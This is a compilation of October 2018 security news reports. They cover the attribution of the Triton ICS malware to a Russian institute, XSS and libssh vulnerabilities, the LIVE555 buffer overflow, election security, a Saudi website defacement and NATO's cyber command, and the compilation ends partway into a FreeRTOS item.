Russian Government-owned research institute linked to Triton attacks
24.10.2018 securityaffairs
BigBrothers  ICS  Virus

Security experts from FireEye found evidence that links the development of the Triton malware (aka Trisis and HatMan) to a Russian government research institute.
In December 2017, experts from FireEye discovered a new strain of malware dubbed Triton that was specifically designed to target industrial control systems (ICS).

The Triton malware has been used in attacks aimed at a critical infrastructure organization in the Middle East, experts speculate the involvement of a state-sponsored actor for sabotage purpose due to the lack of financial motivation and the level of sophistication of the attacks.

According to experts at Dragos firm, threat actors behind the malware tracked as Xenotime, have been around since at least 2014, The APT group was uncovered in 2017 after they caused a shutdown at a critical infrastructure organization somewhere in Saudi Arabia.

The Triton malware is designed to target Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers that are used in industrial environments to monitor the state of a process and restore it to a safe state or safely shut it down if parameters indicate a potentially hazardous situation.

Triton malware

Once gained access to the SIS system, the threat actor deployed the TRITON malware, a circumstance that indicates that attackers had a knowledge of such systems. According to FireEye the attackers pre-built and tested the tool which would require access to hardware and software that is not widely available. TRITON is also designed to communicate using the proprietary TriStation protocol which is not publicly documented, this implies that the attackers reverse engineered the protocol to carry out the attack.

The Triton malware interacts with Triconex SIS controllers., it is able to read and write programs and functions to and from the controller.

FireEye experts discovered a link between the Triton malware, tracked by the company as TEMP.Veles, and the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), a Russian government research institute in Moscow.

Triton linked to Russia

FireEye collected strong evidence suggesting that the Russian CNIIHM institute has been involved in the development of some of the tools used in the Triton attack.

“FireEye Intelligence assesses with high confidence that intrusion activity that led to deployment of TRITON was supported by the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM; a.k.a. ЦНИИХМ), a Russian government-owned technical research institution located in Moscow. The following factors supporting this assessment are further detailed in this post.” reads the analysis published by FireEye.

FireEye uncovered malware development activity that is very likely supporting TEMP.Veles activity. This includes testing multiple versions of malicious software, some of which were used by TEMP.Veles during the TRITON intrusion.
Investigation of this testing activity reveals multiple independent ties to Russia, CNIIHM, and a specific person in Moscow. This person’s online activity shows significant links to CNIIHM.
An IP address registered to CNIIHM has been employed by TEMP.Veles for multiple purposes, including monitoring open-source coverage of TRITON, network reconnaissance, and malicious activity in support of the TRITON intrusion.
Behavior patterns observed in TEMP.Veles activity are consistent with the Moscow time zone, where CNIIHM is located.
We judge that CNIIHM likely possesses the necessary institutional knowledge and personnel to assist in the orchestration and development of TRITON and TEMP.Veles operations.”
Experts pointed out that Triton is linked to Russia, the CNIIHM, and an individual located in Moscow. Some of the TEMP.Veles hacking tools were tested using an unnamed online scan service. A specific user of the service who has been active since 2013 has tested various tools across the time.

The user also tested several customized versions of widely available tools, including Metasploit, Cobalt Strike, PowerSploit, the PowerShell-based WMImplant, and cryptcat.

In many cases, the custom versions of the tools were used in TEMP.Veles attacks just days after being submitted to the testing environment.

The experts discovered that a PDB path contained in a tested file included a string that appears to be an online moniker associated with a Russia-based individual active in Russian information security communities since at least 2011.

According to a now-defunct social media profile, the individual was a professor at CNIIHM.

FireEye also discovered that one IP address registered to the Russian research institute was involved in the Triton attacks.

“While we know that TEMP.Veles deployed the TRITON attack framework, we do not have specific evidence to prove that CNIIHM did (or did not) develop the tool.” continues the expert.

“We infer that CNIIHM likely maintains the institutional expertise needed to develop and prototype TRITON based on the institute’s self-described mission and other public information.”

Experts cannot exclude that some employees of CNIIHM carried out the attack without any involvement of the institute.

“Some possibility remains that one or more CNIIHM employees could have conducted the activity linking TEMP.Veles to CNIIHM without their employer’s approval. However, this scenario is highly unlikely.” FireEye concludes.

Japan Orders Facebook to Improve Data Protection
23.10.2018 securityweek

The Japanese government on Monday ordered Facebook to improve protection of users' personal information following data breaches affecting tens of millions of people worldwide.

Facebook said early this month that hackers accessed the personal data of 29 million users in a breach at the world's leading social network first disclosed late September.

The company had originally said up to 50 million accounts were affected in a cyberattack that exploited a trio of software flaws to steal "access tokens" that enable people to automatically log back onto the platform.

Japan's Personal Information Protection Commission on Monday demanded the social media giant investigate why the personal data was hacked and draw up preventive measures.

Facebook told Japanese authorities the 29 million people hacked in the latest attack may include Japanese users, top government spokesman Yoshihide Suga has said.

Facebook also acknowledged earlier this year that tens of millions of users had their personal data hijacked by Cambridge Analytica, a British political firm which worked for Donald Trump in 2016.

Up to 100,000 Facebook users may have been affected in Japan in that scandal, the commission said.

"It is the first time that the commission, which investigated the data leak with British authorities, has issued warnings to Facebook," an official told AFP.

The commission also ordered Facebook to communicate better with users and respond to them promptly, for example when they request their accounts be deleted.

Facebook pledged to "promptly inform users if the platform was inappropriately used and cooperate with the commission and other countries' regulators" on its website.

Recent Branch.io Patch Creates New XSS Flaw
23.10.2018 securityweek

The patch for a recently disclosed cross-site scripting (XSS) vulnerability in Branch.io introduced another similar flaw, a security researcher revealed last week.

California-based Branch.io provides customers with solutions that help create deep links for referral systems, invitations, and sharing links for attribution and analytics purposes. The service is used by many popular web platforms, including imgur, Shopify, Tinder and Yelp.

Recently, researchers at vpnMentor discovered a vulnerability in Branch.io that potentially exposed hundreds of millions of users to XSS attacks. The bug has been addressed fast and there was no evidence of malicious exploitation.

Now, Detectify security researcher Linus Särud reveals that the patch actually resulted in another XSS vulnerability. Furthermore, he explains that exploitation of this bug is actually possible using the payload for a flaw he discovered several months ago and which had been previously addressed.

The researcher discovered the initial vulnerability on a page apparently designed to redirect to a mobile app. The vulnerable file would check the redirect parameter against a blacklist and continue with the redirection if not found.

“To exploit this we need to create a link that will execute as Javascript while the protocol of it is not ‘javascript’. As far as I know this should not be possible according to browser specifications,” Särud notes.

After discovering that the blacklist could be bypassed with an empty protocol, he was eventually able to create a working exploit for Safari and then reported the bug to some of the bigger sites that used Branch.io. Apple too was notified of the issue.

Branch.io, which Särud does not name in his blog post and refers to as a “SaaS vendor,” was also alerted and a fix was released, but only a temporary one that actually broke the page the bug was discovered on, the researcher says. Following vpnMentor’s report, however, he discovered that the initial, temporary fix was apparently replaced with a permanent one.

“What makes everything interesting is that the initial payload still worked, even after the vulnerabilities found by vpnMentor had been resolved. The fix for the second vulnerability was still vulnerable to a third vulnerability, using the very same payload as in the first report,” Särud says.

The bug, however, was no longer pure DOM-based XSS (where the payload is executed by modifying the DOM environment in the victim’s browser). The URL parameters were reflected server side, but the attack “more or less still worked in the same way.”

“The solution of fixing the third vulnerability was now to add ‘ ‘ and ‘:’ to the blacklist,” Särud reveals. Because the function needs to support a variety of different custom app protocols, the use of a whitelist instead of a blacklist is likely impossible, although strongly recommended, the researcher concludes.

While Apple was informed on the protocol bug when it was initially discovered, the attack still works in the latest version of Safari, on both macOS and iOS.

Securing the Vote Against Increasing Threats
23.10.2018 securityweek

With the U.S. mid-term elections just a couple of weeks away, there are continuing concerns over the security of the electronic voting procedures used by many states. These concerns range from the integrity of state voter registration databases through the compromise of individual voting machines to the accuracy of their calibration without a paper audit trail to confirm accurate vote tallying.

Hacking the vote can be differentiated from manipulating the voter. Russian attempts to manipulate voters occurred in the 2016 presidential election, and are happening now with the mid-terms. On Friday, October 19, a Russian national named Elena Alekseevna Khusyaynova, 44, was charged for her alleged role in a Russian conspiracy to interfere in the U.S. political system, including the 2018 midterm election.

According to the DoJ, Khusyaynova operated as chief accountant for 'Project Lakhta', which allegedly used social media and other internet platforms to address topics ranging from immigration, gun control and the Second Amendment, the Confederate flag, race relations, LGBT issues, the Womenís March, and the NFL national anthem debate. The project sought to conduct what it called internally "information warfare against the United States."

It is against this background of active and continued foreign 'meddling' in U.S. elections that concern over the security of the vote itself has become a serious concern.

The state of Georgia provides an illustration of these concerns. The Coalition for Good Governance and citizens of Georgia sued the Secretary of State in an attempt to force a block on the state using electronic voting in the mid-terms. They cited insecurity of the devices, lack of a paper audit trail, and possible compromise of the state's voter registration database.

In this instance, Judge Amy Totenberg denied the plaintiffs' motion, but made it clear that she would be receptive to future applications. She also made it clear that she was unhappy with the way the state handled "the ramifications of the major data breach and vulnerability at the Center for Election Services"; which is where the Georgia voter registration database had been left exposed to the internet.

Malicious manipulation of the database could have a serious effect on the accuracy of votes. Richard DeMillo, director of Georgia Tech's Center for 21st Century Universities, told SecurityWeek, "If I were a hacker trying to affect an election in this state, that's where I would start." With no suggestion of a connection, it is noticeable that early voters by 18 October (in person or by mail) were up 230% on the number of early voters at the same time in 2014 (figures from the BBC). At the same time, many of the postal votes are being rejected. Figures sent to SecurityWeek by the Coalition for Good Governance suggest that in one Georgia county 11.1% of African-American postal votes, 15.3% of Asian-American postal votes, and 3.8% of Caucasian postal votes had been rejected by election officials by October 18.

Georgia is not the only state to have received concerns over the integrity of the voter registration database. On October 15, 2018, Anomali posted a blog, 'Estimated 35 Million Voter Records For Sale on Popular Hacking Forum'. The details purport to be current, and come from 19 different states -- including Georgia.

Anomali writes, "Given the illicit vendor claims of weekly updates of voter records and their high reputation on the hacker forum, we assess with moderate confidence that he or she may have persistent database access and/or contact with government officials from each state. These types of unauthorized information disclosures increasing the threat of possible disruptive attacks against the U.S. electoral process such as voter identity fraud and voter suppression."

The potential for persistent access to voter registration databases in multiple states is concerning. In this instance, however, Mark Arena (CEO at Intel 471, which worked with Anomali on the discovery) told SecurityWeek, "Intel 471 has not seen any indication that threat actors are seeking to use the voter data to influence the elections. We assess that the most likely potential use of this voter data is for fraud as per other compromised databases with similar personally identifiable information."

Protecting these databases should be relatively simple -- it's what business does all the time. It seems clear, however, that many states have not taken as much care as is necessary. Of course, this is not a problem specific to election databases. However, stringent data protection laws with hefty financial sanctions (such as GDPR) are forcing companies to take more concern over how and where they store personal data. It is likely that if states and state officials were subject to serious sanctions, voter registration databases would be kept more secure for future elections.

Protecting the individual voting machines -- especially those known as direct-recording election (DRE) systems (that do not produce a paper audit trail) is a much harder task. SecurityWeek turned to Darien Kindlund, VP of technology at Insight Engines, to gain an understanding.

Kindlund pointed to two primary problems making voting machine security difficult. The first is the age of most systems, and the second is the nature of their use.

Forty-one states will be using equipment that is more than 10 years old. Old computers may be running operating systems that are no longer supported, while there is no easy way to ensure that those supported have received the correct level of patches. In fact, it is estimated that 41 states will use voting machines that are no longer manufactured.

The machines themselves spend most of their time in storage -- which, provided physical security can be maintained, ensures an effective air-gap. At the time of an election, however, DRE systems are wheeled-out and plugged into the internet to allow votes to be cast, accumulated and counted.

The sheer volume of aging machines that suddenly come into play places an exceedingly heavy, but sporadic, load on the teams charged with securing them. Georgia, for example, has 27,000 Diebold AccuVote DRE touchscreen voting units running a modified version of Windows CE.

Georgia was the first state to move to electronic voting starting in 2002, and some of the systems are that old. As long ago as 2007, Princeton university's Feldman, Halderman and Felten analyzed the AccuVote systems and concluded, "the machine is vulnerable to a number of extremely serious attacks that undermine the accuracy and credibility of the vote counts it produces."

Nothing much has changed. At this year's Vote Hacking Village at Def Con, 35 out of 39 children aged between six and 17 were able to break into facsimiles of government election results websites, developed by former White House technology advisor Brian Markus, within three hours. The machines themselves fared little better. One system was using SSL certificates five years old, another had a removable memory card containing supervisor passwords in plain text, and another was running unsupported Windows XP that could be hacked in seconds.

The argument that the voting machines are kept securely off-line while not in use isn't valid. Kindlund points out that in use they are connected to the internet and could be compromised during that period. "Even while off-line," he added, "if attackers can gain access to one machine, it could be compromised. No security expert would guarantee that it could not be compromised with a stealthy malware that could spread worm-like once the machines are connected for an election."

But they remain just computers, and the security industry has been protecting computers for years. The biggest problem, suggests Kindlund, is the requirement for a small security team to monitor a large number of machines that is not part of their normal day-to-day workload. The solution, he suggests, is occasional checking by automated means.

His own firm, for example, offers Insight Investigator for Splunk. This is powered by a natural language processor that allows less-qualified staff to query a Splunk database. It could accept and respond to conversational queries such as, "Show me DRE systems with updates by status this week"; "Show me vulnerable winvote systems this week versus last week"; and for those DRE systems with remote access capabilities, "Show me logins to accuvote systems by source ip and dest ip this week".

Such methods would highlight vulnerable systems easily and within an acceptable timeframe -- allowing them to be made secure ahead of a vote.

The consensus among security experts is that electronic voting is not currently secure -- but there is no reason that it could not be made as secure as any other computer-based system. It just requires more effort and expenditure to do so. For now, there is no public evidence that any foreign power is attempting to sway the outcome of the 2018 U.S. mid-term elections through hacking the vote. But it wouldn't need to. If a foreign policy is to spread confusion, dissension and distrust within an adversary population, it has already succeeded. And it will continue to succeed until the vote is acknowledged to be secure, and the entire population is confident that their own vote will be accurately counted.

Hackers Deface Website of Saudi Investment Forum
23.10.2018 securityweek Hacking

A website for a Saudi investment summit was down on Monday after an apparent cyber attack, just a day before the three-day conference overshadowed by the murder of journalist Jamal Khashoggi begins.

There was no immediate claim of responsibility for the apparent attack on the Future Investment Initiative (FII) website, as organisers scrambled to prepare for the summit after a string of cancellations from global business titans over the murder.

Hackers appeared to deface the website with a host of critical messages over its role in the war in Yemen and accusing the kingdom of terrorism financing.

The website was later taken down.

Organisers of FII did not respond to requests for comment. Local media, including the pro-government Okaz newspaper, said the website had come under an "electronic attack".

The forum, nicknamed "Davos in the desert", was meant to project the historically insular petro-state as a lucrative business destination and set the stage for new ventures and multi-billion dollar contracts.

But it has been overshadowed by growing global outrage over the murder of Khashoggi inside the kingdom's consulate in Istanbul.

Dozens of global executives -- from bankers JP Morgan to carmaker Ford and ride-hailing app Uber -- have scrapped plans to attend.

Flaw in Media Library Impacts VLC, Other Software
23.10.2018 securityweek

A serious vulnerability in the LIVE555 Streaming Media RTSP server affects popular applications, including VLC, MPlayer and others, Cisco Talos has discovered.

Developed by Live Networks, Inc, LIVE555 Streaming Media represents a set of open-source C++ libraries meant for multimedia streaming. The libraries provide support for open standards used in streaming, but can also be used for the management of various popular video and audio formats. In addition to media players, the libraries are used for cameras and other embedded devices.

Recently, security researcher Lilith Wyatt of Cisco Talos discovered an exploitable code execution bug in the HTTP packet-parsing functionality of the LIVE555 RTSP server library. An attacker can achieve code execution by sending a specially crafted packet to cause a stack-based buffer overflow.

Tracked as CVE-2018-4013, the vulnerability was found in a function that parses HTTP headers for tunneling RTSP over HTTP. The ability to tunnel RTSP over HTTP, enabled by LIVE555 for the standard RTSP server, is served by a different port bound by the server.

Typically, port TCP 80, 8000, or 8080 is used, based on what is available on the host machine, because the port includes support for normal RTSP. However, it is also possible for the HTTP client to negotiate the RTSP-over-HTTP tunnel.

To exploit the security bug, an attacker could create a packet containing multiple "Accept:" or "x-sessioncookie" strings, thus leading to a stack buffer overflow in the function "lookForHeader."

The vulnerability, which has a CVSSv3 score of 10.0, has been confirmed to affect Live Networks LIVE555 Media Server version 0.92 (older versions may also be impacted). Live Networks addressed the vulnerability last week.

Cisco, F5 Networks Investigate libssh Vulnerability Impact
23.10.2018 securityweek

Cisco and F5 Networks are investigating the possible impact of the recently patched libssh vulnerability on their products, while other vendors have concluded similar investigations.

The bug, discovered by Peter Winter-Smith, security consultant at NCC Group, could allow an attacker to authenticate on a server without credentials. Specifically, the attacker could send the server a message to trick it into believing that authentication has been successful even if the process didn’t even start.

The flaw was reported to libssh developers on June 25 and impacts versions 0.6 and later of the library. Tracked as CVE-2018-10933, the vulnerability was addressed with the release of libssh 0.8.4 and 0.7.6 last week.

There are thousands of servers using libssh to implement the Secure Shell (SSH) remote login protocol (many operated by Verizon Wireless and Sprint PCS), but not all of them might be impacted, Winter-Smith suggested. Only libssh operating in server mode, but not the usual client mode, appears affected.

GitHub, which uses the library, said last week it wasn’t impacted, although it did apply the provided patch. OpenSSH, libssh2, curl, and libcurl aren’t affected either.

Within days after the flaw was made public, vendors have started to investigate the impact on their products, and some even confirmed they are affected.

For the past several days, Cisco has been trying to determine which of the products that use the library are affected. The company has published a list of possibly impacted applications, but has yet to confirm the vulnerability in any of them.

F5 Networks too has been looking into its product line, and discovered that BIG-IP application delivery controllers are exposed (only BIG-IP AFM SSH virtual servers that use key-based authentication are vulnerable). Other products are either not impacted or haven’t been yet confirmed to be affected.

Red Hat Enterprise Linux 7 Extras has been confirmed vulnerable, the same as Debian (fixed in version 0.7.3-2+deb9u1), Ubuntu (18.04 LTS, 16.04 LTS, 14.04 LTS, and derivatives), and SUSE Linux Enterprise 12 and 15.

Teamspeak uses libssh, but not in a way that is susceptible to the vulnerability. Alert Logic says it isn’t impacted by the bug and that the Alert Logic appliance is not vulnerable. Netgate’s pfSense isn’t affected, and neither is Centrify DirectControl. Cyber exposure company Tenable has also assessed the weakness and determined that its products are not impacted.

In addition to exploit code for the vulnerability being published online, tools that can be used to identify this vulnerability have been released too.

The “likelihood of exploitation in the wild is low,” the co-founder and director of Hacker House suggests.

The fix for the DOM-based XSS in Branch.io introduced a new XSS flaw
23.10.2018 securityaffairs

The security patch for the recently disclosed cross-site scripting (XSS) vulnerability in Branch.io has introduced another similar XSS vulnerability.
According to the security researcher Linus Särud, the security fix for the recently disclosed cross-site scripting (XSS) vulnerability in Branch.io has introduced another similar XSS vulnerability.

The Branch.io company provides the leading mobile linking platform, with solutions that unify user experience and measurement across different devices, platforms, and channels.

The service is used by many popular web services, including Tinder, imgur, Shopify, and Yelp.

The flaw was disclosed a few days ago by the researchers at vpnMentor who explained that an attacker could have been exploited them to access Tinder users’ profiles.

“After initial reconnaissance steps were done, a Tinder domain with multiple client-side security issues was found – meaning hackers could have access to users’ profiles and details.

Immediately after finding these vulnerabilities, we contacted Tinder via their responsible disclosure program and started working with them.” reads the analysis published by vpnMentor.

“We learned that the vulnerable endpoint isn’t owned by Tinder, but by branch.io, an attribution platform used by many big corporations around the globe. The Tinder security team helped us get in touch with them, and accordingly, they’ve put out a timely patch.”

Now Särud discovered even after the deployment of the security patch it is possible to exploit a new XSS flaw using the payload for a flaw he discovered several months ago and that had been previously fixed.

“Almost a year ago, I started to look into the assets belonging to a company that are running a public bug bounty-program. One way of approaching a target is to look for plain HTML-files hosted on a site that is not normally built that way. This type of file often contains DOM-XSS vulnerabilities” reads the analysis of the expert.

“The purpose of the page seems to be to redirect to a mobile app. It takes the redirect-parameter, checks the protocol against a blacklist and if not found redirects to it.”

The researchers discovered the initial vulnerability on a page apparently designed to redirect to a mobile app, it would check the redirect parameter against a blacklist and if not found redirects to it.

“To exploit this we need to create a link that will execute as Javascript while the protocol of it is not ‘javascript’. As far as I know this should not be possible according to browser specifications,” continues Särud.


The expert discovered that it is possible to bypass the blacklist using an empty protocol, then he devised a working exploit for Safari and reported the issue to the most popular websites that used Branch.io.

The expert notified the issue to Branch.io, referenced in the report as a “SaaS vendor,” but the company addressed it with a temporary fix.

After the publication of the security advisory from vpnMentor, Särud noticed that the temporary fix was replaced with a permanent one that introduced the new XSS-vulnerabilities.

“Fast forward some months, and I received a link to vpnMentor’s write-up which shows that the temporary fix had been replaced with a more permanent one. However that in turn resulted in new XSS-vulnerabilities, this time found by vpnMentor.” Särud explained.

“What makes everything interesting is that the initial payload still worked, even after the vulnerabilities found by vpnMentor had been resolved. The fix for the second vulnerability was still vulnerable to a third vulnerability, using the very same payload as in the first report,”

The flaw recently introduced is no longer pure DOM-based XSS, it is now reflected server side but the researchers confirmed it works more or less in the same way.

“The solution of fixing the third vulnerability was now to add ‘ ‘ and ‘:’ to the blacklist,” Särud said.

“It is most likely this function need to support a lot of different custom app protocols making it more or less impossible to use a whitelist instead of a blacklist, an approach that otherwise would been strongly recommended.”

The expert concluded that despite Apple was notified on the protocol bug when it was discovered for the first time, the attack still works in the latest version of Safari for macOS and iOS.

Saudi Future Investment Initiative website defaced by the hackers

23.10.2018 securityaffairs Hacking

Hackers defaced Future Investment Initiative (FII) website for a Saudi investment summit just a day before the three-day conference begins.
An unknown group of hackers has defaced the website of the Future Investment Initiative (FII) website, a Saudi investment summit, just a day before the three-day conference begins.

Future Investment Initiative defaced

Below the Tweet of Nahayat Tizhoosh (@NahayatT), a producer with CBC News Network.

View image on TwitterView image on TwitterView image on Twitter

Nahayat Tizhoosh
'Davos in the Desert' site has been hacked @FIIKSA #Khashoggi

4:12 PM - Oct 22, 2018
80 people are talking about this
Twitter Ads info and privacy
Hackers also leaked through the defaced homepage, names and phone numbers of several Saudi individuals, including government employees and employees in state-backed companies.

No one has claimed responsibility for the defacement of the website of the event, also called as “Davos in the desert.”

The murder of journalist Jamal Khashoggi caused a string of cancellations from global business giants, executives — from bankers JP Morgan to carmaker Ford and ride-hailing app Uber — will not attend the event.

The attackers are obviously politically motivated, they defaced the website with messages against Saudi Arabia and the role of its kingdom in the war in Yemen, they also accuse the Government of terrorism financing.

Once discovered the defacement, the website was taken down by the organizers of the Future Investment Initiative.

“Organisers of FII did not respond to requests for comment. Local media, including the pro-government Okaz newspaper, said the website had come under an “electronic attack”.” reported the AFP press release.

The forum aimed at creating new billionaire opportunities for organizations in the kingdom, but evidently the murder of Khashoggi inside the kingdom’s consulate in Istanbul triggered a long string of cancelations.

Cyberbit Launches Portable ICS Security Assessment Solution
23.10.2018 securityweek

Cyberbit SCADAScan

ATLANTA — SECURITYWEEK 2018 ICS CYBER SECURITY CONFERENCE — Israel-based Cyberbit on Monday announced the launch of SCADAScan, a portable solution designed to help organizations assess the security of their industrial control networks.

A subsidiary of Elbit Systems, Cyberbit offers cybersecurity simulation solutions, along with a platform for detecting and responding to incidents across IT and OT networks. The company recently raised $30 million.

The firm’s latest product, SCADAScan, uses deep packet inspection (DPI) to monitor traffic passing through the ICS/SCADA network and provide a map of assets, as well as information on vulnerabilities and other potential threats. SCADAScan is immediately available.Cyberbit SCADAScan

SCADAScan, a device that users can plug into a network switch for passive monitoring, is housed by a wheeled suitcase, which provides increased mobility. The suitcase is water resistant, it weighs 12.5 kg (27 lbs), and it can be taken on an airplane as a carry-on.

Cyberbit says the solution can be used by intervention teams, consultants and service providers for on-demand OT security assessments. Critical infrastructure organizations that don’t want to permanently integrate a full-scale monitoring solution into their network can use it to perform periodical scans, minimizing integration and deployment efforts, and providing instant scanning and assessment.

Organizations with larger, distributed networks can use SCADAScan to conduct scans at each of their locations. Cyberbit recommends running a scan for at least 48 hours, but the company says useful data can also be obtained after 2 hours.

SCADAScan is powered by Cyberbit’s SCADAShield solution, which provides monitoring, detection, forensics, visibility, and policy enforcement capabilities for ICS networks. The new product can also be integrated with the company’s Security Orchestration, Automation and Response (SOAR) solution.

Cyberbit SCADAShield

As for hardware, SCADAScan is powered by a Lenovo ThinkPad P51 laptop and an IPC3 Blackbox industrial PC. It also includes diodes that ensure the solution is only listening and no data is sent out to the analyzed networks – the networks are in many cases sensitive and sending out data could cause disruptions.

The SCADAShield software receives two major updates every year and multiple minor updates. These updates can be deployed to SCADAScan via USB or simply by connecting the laptop to the network via Ethernet.

In an interview with SecurityWeek, Edy Almer, VP of Products at Cyberbit, explained that for some organizations it’s important that no data leaves the premises, which is why SCADAScan comes with a clean-up procedure that removes all potentially sensitive data.

Google Boosts Android Security with Protected Confirmation
23.10.2018 securityweek

Google further improved the security of Android with the inclusion of a new API in the latest operating system release.

Called Protected Confirmation, the API would take advantage of a hardware-protected user interface (Trusted UI) to perform critical transactions. When an application uses the API, the user is presented with a prompt, asking them to confirm the transaction.

After user confirmation is received, the information is cryptographically authenticated, meaning that Protected Confirmation can better secure the transaction. The Trusted UI, which is in control, keeps the data safe from fraudulent apps or a compromised operating system.

The API, Google says, can also be used to boost the security of other forms of secondary authentication, such as a one-time password or a transaction authentication number (TAN), mechanisms that fail to provide protection if the device has been compromised.

With Protected Confirmation, the confirmation message is digitally signed but, because the signing key only resides in the Trusted UI’s hardware sandbox, it is not possible for malicious apps or compromised operating systems to trick the user into authorizing anything. The signing keys are created using the AndroidKeyStore API.

“Before it can start using Android Protected Confirmation for end-to-end secure transactions, the app must enroll the public KeyStore key and its Keystore Attestation certificate with the remote relying party. The attestation certificate certifies that the key can only be used to sign Protected Confirmations,” Janis Danisevskis, Information Security Engineer, Android Security, explains.

Android Protected Confirmation, Danisevskis says, makes many other use cases possible as well, such as person-to-person money transfers (e.g. Royal Bank of Canada), authentication (e.g. Duo Security, Nok Nok Labs, and ProxToMe), and medical device control (e.g. Insulet Corporation and Bigfoot Biomedical).

Insulet, a manufacturer of tubeless patch insulin pumps, has already showed how they can modify an insulin management system to leverage Protected Confirmation to confirm the amount of insulin to be injected. This should improve quality of life and reduce cost, given that a person with diabetes would be able to use their smartphone instead of a secondary device for control.

“We've been working with FDA as part of DTMoSt, an industry-wide consortium, to define a standard for phones to safely control medical devices, such as insulin pumps. A technology like Protected Confirmation plays an important role in gaining higher assurance of user intent and medical safety,” Danisevskis continues.

An optional feature in Android, Protected Confirmation has low-level hardware dependencies. Google Pixel 3 and 3XL are the first smartphones to support the API, but the feature may not be integrated into devices from other manufacturers.

NATO military command center should be fully operational in 2023
23.10.2018 securityweek

The NATO military command center should be fully operational in 2023, every member states will contribute with its cyber capabilities to the military hub.
The new NATO military command center should be fully operational in 2023, among its tasks the defense of the critical infrastructure of member states and the ability to carry out cyber attacks according to rules of engagement still to be defined.

NATO alliance is aware of growing threats in the cyberspace and the new NATO military command center aims to respond them.

Each member of the alliance will contribute to the offensive cyber capabilities of the new military hub.

“While NATO does not have its own cyber weapons, the U.S.-led alliance established an operations center on Aug. 31 at its military hub in Belgium. The United States, Britain, Estonia and other allies have since offered their cyber capabilities.” reported the Reuters.

“This is an emerging domain and the threat is growing,” said Major General Wolfgang Renner, a German air force commander who oversees the new cyber operations center, or CYOC, in Mons.

“We have to be prepared, to be able to execute operations in cyberspace. We have already gone beyond protection and prevention,” he told Reuters during a NATO cyber conference.

A team of 70 cyber experts will be the pillar of the new NATO military command center that will gather and share information on various threat actors, including cybercrime syndicates, nation-state attackers, terrorists, and hacktivists.

According to the NATO Communication and Information Agency, the NATO communication and computer networks face hundreds of major attacks every month., China, North Korea, and Russia continuously target the infrastructure of the alliance with cyber espionage purposes.

Recent cyber espionage campaigns attributed to Russia have raised the debate inside the alliance about an urgent response to the aggressive cyber strategy of the Kremlin.

The European Union earlier last week discussed various responses to the attackers, including economic sanctions to countries that mounted the cyber attacks.

“Our ultimate aim is to be completely aware of our cyberspace, to understand minute-by-minute the state of our networks so that commanders can rely on them,” said Ian West, chief of cyber security at the NATO communication agency.

Let’s remind that NATO has recognized cyberspace as the fifth element of warfare, so the alliance could respond with conventional weapons in case of a powerful cyber attack.

NATO has warned that in the future any cyber attack against a member state could trigger a military response according to the alliance’s Article 5, mutual defence clause.

“Our concept of operations, a toolbox for short-notice decisions about how to respond, is not in place yet. This is one of the challenges we face,” Renner said.

“If NATO can agree cyber warfare principles, the alliance hopes to integrate individual nations’ cyber capabilities into alliance operations, coordinated through the Mons cyber operations center and under the command of NATO’s top general, the Supreme Allied Commander Europe, or SACEUR.” continues the Reuters.

“That could allow the top general to take quick decisions on whether to use cyber weapons, similar to existing agreements for NATO’s air defenses and its ballistic missile shield, where a commander has only minutes to decide what action to take.”

MPlayer and VLC media player affected by critical flaw CVE-2018-4013
23.10.2018 securityweek

Cisco Talos expert discovered a code execution vulnerability (CVE-2018-4013) that has been identified in Live Networks LIVE555 streaming media RTSPServer.
Lilith Wyatt, a security researcher at Cisco Talos, has discovered a critical remote code execution vulnerability (CVE-2018-4013) in the LIVE555 media streaming library that is used by popular media players, including VLC and MPlayer.

LIVE555 Streaming Media is a set of open-source C++ libraries maintained by Live Networks Inc. for multimedia streaming, it supports open standards such as RTP/RTCP and RTSP for streaming.
LIVE555 Streaming Media is able to process video RTP payload formats such as H.264, H.265, MPEG, VP8, and DV, and audio RTP payload formats such as MPEG, AAC, AMR, AC-3 and Vorbis.
An attacker can exploit the vulnerability by sending a specially crafted packet containing multiple “Accept:” or “x-sessioncookie” strings that triggers a stack-based buffer overflow, resulting in code execution.
The vulnerability affects the HTTP packet parsing functionality that analyzes HTTP headers for RTSP tunneling over HTTP.

“An exploitable code execution vulnerability exists in the HTTP packet-parsing functionality of the LIVE555 RTSP server library. A specially crafted packet can cause a stack-based buffer overflow, resulting in code execution. An attacker can send a packet to trigger this vulnerability.” reads the advisory published by Talos.

The CVE-2018-4013 flaw potentially exposes millions of users of media players to cyber attacks.

The flaw affects Live Networks LIVE555 Media Server, version 0.92 and likely the earlier version of the product, a security update has already been issued to address the vulnerability.

Users of vulnerable media players are recommended to update their installs to the latest version.

Experts released the following SNORT rules to detect attempts to exploit these vulnerabilities:

48067 – 48068

Israel Defense Forces were searching systems to spy on private social media messages
23.10.2018 securityaffairs

The Israel Defense Forces has bid to obtain spying systems that will allow monitoring of the private messages of social media users.
Monitoring of social media platforms is a crucial activity for intelligence agencies, almost any government is working to gather intelligence for these systems.

According to the Haaretz, the Israel Defense Forces has bid to obtain spying systems that will allow monitoring of the private messages of social media users.

“The Israel Defense Forces asked cybersecurity companies in 2016 to present proposals for creating a system that would monitor social media users’ personal correspondence.” states the Haaretz.

The newspaper had obtained a document that shows that in 2016 the Israel Defense Forces asked the cyber companies to propose their solutions for the spying on users of the social networks.

Haaretz revealed that the Israeli Defence Forces want to use the system to trace and monitor the activity of social media users, including all information posted or exchanged through the most popular platforms, including Facebook, Twitter, Instagram and YouTube.

The monitoring system would also monitor posts and information exchanged in several languages, including Hebrew, Arabic and English.

“The system in question would have to scan and store both private and public information from users of Facebook, Twitter, Instagram, Google Plus, YouTube and so on.” continues the newspaper.

“It does not specify who would be monitored; or Jewish citizens of Israel, or Palestinian residents of the Jerusalem – who for the most part do not hold Israeli citizenship – would be targeted; or any restrictions set by any outside entity would be imposed on the surveillance activities.“

The surveillance system have to allow government operators to spy on users by searching for targeted keywords, such as terror, resistance, nationality and religion.

Of course, the IDF declared that the document obtained by the Haaretz was a draft of an invitation to submit bids that did not come to fruition.

The Israeli Defense explained added that the bidding process was not carried out for both operational and technological reasons

FreeRTOS flaws expose millions of IoT devices to cyber attacks
23.10.2018 securityaffairs
IoT  Vulnerebility

Researchers found that one of the most popular Internet of Things real-time operating system, FreeRTOS, is affected by serious vulnerabilities.
Researchers at Zimperium’s zLabs team have found that one of the most popular Internet of Things real-time operating system, FreeRTOS, is affected by serious vulnerabilities.

